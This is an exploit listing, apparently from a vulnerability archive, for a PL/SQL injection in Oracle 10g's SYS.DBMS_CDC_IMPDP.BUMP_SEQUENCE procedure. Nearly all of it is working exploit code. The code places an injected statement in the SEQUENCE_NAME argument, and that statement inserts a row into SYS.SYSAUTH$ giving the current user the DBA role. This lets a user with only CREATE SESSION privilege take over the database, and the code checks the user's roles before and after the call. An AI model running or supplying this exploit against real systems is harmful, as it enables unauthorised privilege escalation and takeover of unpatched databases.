
Oracle 10g SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE PL/SQL Injection

Jan 24 2007 10:42:46
Source: ace
/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret <joxeankoret@yahoo.es>
* Privileges needed:
*
* - CREATE SESSION
*
* Max. Length 97. Very, very cool
*
*/
-- Roles held by the current user before the call
select *
from user_role_privs
;

DECLARE
SEQUENCE_OWNER VARCHAR2(200);
SEQUENCE_NAME VARCHAR2(200);
v_user_id number;
v_commands VARCHAR2(32767);
NEW_VALUE NUMBER;
BEGIN
SELECT user_id INTO v_user_id
FROM user_users;

-- Statement to be injected: inserts a row into SYS.SYSAUTH$ for the current user
v_commands := 'insert into sys.sysauth$ ' ||
' values' ||
'(' || v_user_id || ',4,' ||
'999,null)';

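-- SEQUENCE_NAME carries the injection: the leading quote closes the string
-- literal in the procedure's dynamic PL/SQL, the injected statement follows,
-- and the trailing '--' comments out the rest of the generated block
SEQUENCE_OWNER := 'TEST';
SEQUENCE_NAME := ''',lockhandle=>:1);' || v_commands || ';commit;
end;--';
NEW_VALUE := 1;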
SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE(
SEQUENCE_OWNER => SEQUENCE_OWNER,
SEQUENCE_NAME => SEQUENCE_NAME,
NEW_VALUE => NEW_VALUE
);
END;
/

-- Roles held by the current user after the call, for comparison
select *
from user_role_privs
;